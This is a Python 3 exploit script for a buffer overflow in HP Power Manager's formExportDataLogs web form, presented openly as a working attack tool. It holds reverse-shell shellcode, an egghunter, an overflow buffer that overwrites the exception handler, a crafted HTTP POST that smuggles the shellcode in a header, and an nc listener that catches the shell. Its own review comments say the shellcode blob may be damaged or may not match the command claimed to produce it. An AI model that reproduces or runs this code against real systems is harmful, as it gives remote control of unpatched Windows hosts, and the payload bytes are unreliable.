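#!/usr/bin/env python3
"""HP Power Manager 'formExportDataLogs' buffer overflow -- python3 port / extension.

Based on the HP Power Manager 'formExportDataLogs' Buffer Overflow script by
Muhammad Haidari: https://github.com/Muhammd/HP-Power-Manager

Usage: python3 hp_pm_exploit_p3.py <target_ip> <target_port> <local_port>
    target_ip:   IP address the HP Power Manager web interface is running on
    target_port: port the application is listening on
    local_port:  local port the reverse shell connects back to; the script
                 starts an `nc` listener on it *before* sending the exploit

Before use, swap out the shellcode (`buf` below) for one generated with your
own LHOST, and make sure <local_port> equals the LPORT baked into it -- the
script cannot verify that, and a mismatch means the shell never arrives.

Tested on HP Power Manager 4.2 (Build 7) on Windows 7 Ultimate
(6.1.7600 N/A Build 7600).
Author: CountablyInfinite
"""
from urllib import parse
from time import sleep
from sys import argv, exit
from socket import socket, AF_INET, SOCK_STREAM
from os import system
import subprocess

# Shellcode, prefixed with the egg the hunter searches for.  It travels in the
# Accept: request header, which is why the bad-character list excludes every
# byte that would terminate or break a header line (\x00, \x0a, \x0d, \x20, \x3a, ...).
# Generated with (the last escape of the -b list, `\x5`, is truncated in the
# original copy of this script):
#   msfvenom -p windows/shell_reverse_tcp LHOST=<attacker_ip> LPORT=4411 EXITFUNC=thread \
#     -b '\x00\x1a\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5' x86/alpha_mixed \
#     --platform windows -f python
# NOTE(review): the stub below is not alphanumeric, so it does not look like
# x86/alpha_mixed output, and the copy may have lost bytes in transit --
# regenerate the blob with your own LHOST rather than reusing it.
egg = b"b33fb33f"
buf = egg
buf += b"\x31\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e"
buf += b"\x81\x76\x0e\x99\x95\x85\xbb\x83\xee\xfc\xe2\xf4"
buf += b"\x65\x7d\x07\xbb\x99\x95\xe5\x32\x7c\xa4\x45\xdf"
buf += b"\x12\xc5\xb5\x30\xcb\x99\x0e\xe9\x8d\x1e\xf7\x93"
buf += b"\x96\x22\xcf\x9d\xa8\x6a\x29\x87\xf8\xe9\x87\x97"
buf += b"\xb9\x54\x4a\xb6\x98\x52\x67\x49\xcb\xc2\x0e\xe9"
buf += b"\x89\x1e\xcf\x87\x12\xd9\x94\xc3\x7a\xdd\x84\x6a"
buf += b"\xc8\x1e\xdc\x9b\x98\x46\x0e\xf2\x81\x76\xbf\xf2"
buf += b"\x12\xa1\x0e\xba\x4f\xa4\x7a\x17\x58\x5a\x88\xba"
buf += b"\x5e\xad\x65\xce\x6f\x96\xf8\x43\xa2\xe8\xa1\xce"
buf += b"\x7d\xcd\x0e\xe3\xbd\x94\x56\xdd\x12\x99\xce\x30"
buf += b"\xc1\x89\x84\x68\x12\x91\x0e\xba\x49\x1c\xc1\x9f"
buf += b"\xbd\xce\xde\xda\xc0\xcf\xd4\x44\x79\xca\xda\xe1"
buf += b"\x12\x87\x6e\x36\xc4\xfd\xb6\x89\x99\x95\xed\xcc"
buf += b"\xea\xa7\xda\xef\xf1\xd9\xf2\x9d\x9e\x6a\x50\x03"
buf += b"\x09\x94\x85\xbb\xb0\x51\xd1\xeb\xf1\xbc\x05\xd0"
buf += b"\x99\x6a\x50\xeb\xc9\xc5\xd5\xfb\xc9\xd5\xd5\xd3"
buf += b"\x73\x9a\x5a\x5b\x66\x40\x12\xd1\x9c\xfd\x45\x13"
buf += b"\xb4\x2c\xed\xb9\x99\x95\xd5\x32\x7f\xff\x95\xed"
buf += b"\xce\xfd\x1c\x1e\xed\xf4\x7a\x6e\x1c\x55\xf1\xb7"
buf += b"\x66\xdb\x8d\xce\x75\xfd\x75\x0e\x3b\xc3\x7a\x6e"
buf += b"\xf1\xf6\xe8\xdf\x99\x1c\x66\xec\xce\xc2\xb4\x4d"
buf += b"\xf3\x87\xdc\xed\x7b\x68\xe3\x7c\xdd\xb1\xb9\xba"
buf += b"\x98\x18\xc1\x9f\x89\x53\x85\xff\xcd\xc5\xd3\xed"
buf += b"\xcf\xd3\xd3\xf5\xcf\xc3\xd6\xed\xf1\xec\x49\x84"
buf += b"\x1f\x6a\x50\x32\x79\xdb\xd3\xfd\x66\xa5\xed\xb3"
buf += b"\x1e\x88\xe5\x44\x4c\x2e\x65\xa6\xb3\x9f\xed\x1d"
buf += b"\x0c\x28\x18\x44\x4c\xa9\x83\xc7\x93\x15\x7e\x5b"
buf += b"\xec\x90\x3e\xfc\x8a\xe7\xea\xd1\x99\xc6\x7a\x6e"

# 32-byte egghunter (int 0x2e variant: push 2 / pop eax / int 2e) that scans
# memory for the egg 'b33f' twice in a row and jumps to what follows it.
# Generated with:
#   egghunter.rb -f python -b '\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c&=+?:;-,/#.\\$%\x1a' -e b33f -v 'hunter'
hunter = b""
hunter += b"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e"
hunter += b"\x3c\x05\x5a\x74\xef\xb8\x62\x33\x33\x66\x89\xd7"
hunter += b"\xaf\x75\xea\xaf\x75\xe7\xff\xe7"


def usage(prog: str) -> None:
    """Print the command line synopsis and exit with a non-zero status."""
    print(f"Usage: python3 {prog} <target_ip> <target_port> <local_port>")
    print(f"Example: python3 {prog} 10.10.0.1 80 4411")
    exit(1)


def parse_args(args: list[str]) -> tuple[str, int, int]:
    """Return (host, port, lport) from an argv-style list, or exit via usage().

    Exactly three positional arguments are accepted; both ports must parse
    as integers in 1..65535 (a non-numeric port used to escape as a raw
    ValueError in the original script).
    """
    prog = args[0] if args else "hp_pm_exploit_p3.py"
    if len(args) != 4:
        usage(prog)
    host = args[1]
    try:
        port = int(args[2])   # port the remote application is running on
        lport = int(args[3])  # port the shellcode connects back to
    except ValueError:
        usage(prog)
    if not (0 < port < 65536 and 0 < lport < 65536):
        usage(prog)
    return host, port, lport


def build_buffer() -> bytes:
    """Assemble the overflowing `fileName` value.

    Layout (offsets from the start of the value):
      0    721-len(hunter) filler bytes ('A')
      689  30-byte NOP sled
      719  32-byte egghunter
      751  4 bytes: JMP SHORT 0xC2 (-62), which lands inside the NOP sled
           in front of the hunter
      755  3 bytes: address of pop esi / pop ebx / ret 10 in DevManBE.exe;
           only three bytes are sent, so the high 0x00 of the address is
           presumably supplied by the server's string terminator -- TODO confirm
    NOTE(review): the jmp-short + pop/pop/ret pair looks like an SEH
    overwrite (nSEH / SEH), but the original write-up is not visible here.
    """
    filler = b"\x41" * (721 - len(hunter))
    sled = b"\x90" * 30
    jmp_back = b"\xeb\xc2\x90\x90"  # JMP SHORT 0xC2
    ppr = b"\xd5\x74\x41"           # pop esi # pop ebx # ret 10 (DevManBE.exe)
    return filler + sled + hunter + jmp_back + ppr


def build_request(host: str) -> bytes:
    """Build the raw HTTP POST to /goform/formExportDataLogs.

    The shellcode rides in the Accept: header (the egghunter finds it there),
    the overflow goes URL-encoded into the fileName form field.  All bytes are
    emitted exactly as the original script's latin-1 encoded request.
    """
    host_bytes = host.encode("latin1")
    body = (
        "dataFormat=comma&exportto=file&fileName=" + parse.quote_plus(build_buffer())
        + "&bMonth=03&bDay=12&bYear=2017&eMonth=03&eDay=12&eYear=2017"
        + "&LogType=Application&actionType=1%253B"
    ).encode("ascii")
    return b"".join((
        b"POST /goform/formExportDataLogs HTTP/1.1\r\n",
        b"Host: " + host_bytes + b"\r\n",
        b"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n",
        b"Accept: " + buf + b"\r\n",
        b"Referer: http://" + host_bytes + b"/Contents/exportLogs.asp?logType=Application\r\n",
        b"Content-Type: application/x-www-form-urlencoded\r\n",
        b"Content-Length: " + str(len(body)).encode("ascii") + b"\r\n",
        b"\r\n",
        body,
    ))


def start_listener(lport: int) -> subprocess.Popen:
    """Start `nc -nlvp <lport>` on the current terminal and return the process.

    The listener is started *before* the exploit is sent so the reverse shell
    has something to connect to (the original script only started it after
    the request had gone out).  `sudo` is used only for privileged ports
    (< 1024); binding anything higher needs no root.  The command is passed
    as an argv list, never through a shell.
    """
    cmd = ["nc", "-nlvp", str(lport)]
    if lport < 1024:
        cmd.insert(0, "sudo")
    return subprocess.Popen(cmd)


def main() -> None:
    """Start the listener, deliver the exploit, then hand the terminal to nc."""
    host, port, lport = parse_args(argv)
    print("[+] HP Power Manager 'formExportDataLogs' Buffer Overflow Exploit")
    print(f"[+] Starting local listener on port {lport}")
    listener = start_listener(lport)
    sleep(1)  # give nc a moment to bind before the target tries to connect back
    print(f"[+] Sending exploit to {host}:{port}")
    try:
        with socket(AF_INET, SOCK_STREAM) as sock:
            sock.settimeout(10)  # do not hang forever on an unreachable target
            sock.connect((host, port))
            sock.sendall(build_request(host))  # send() may deliver only part of the buffer
            # Keep the connection open while nc runs, as the original did,
            # so the target is not cut off before it has consumed the request.
            listener.wait()
    except OSError as err:
        print(f"[-] Could not deliver the exploit: {err}")
        listener.terminate()
        exit(1)


if __name__ == "__main__":
    main()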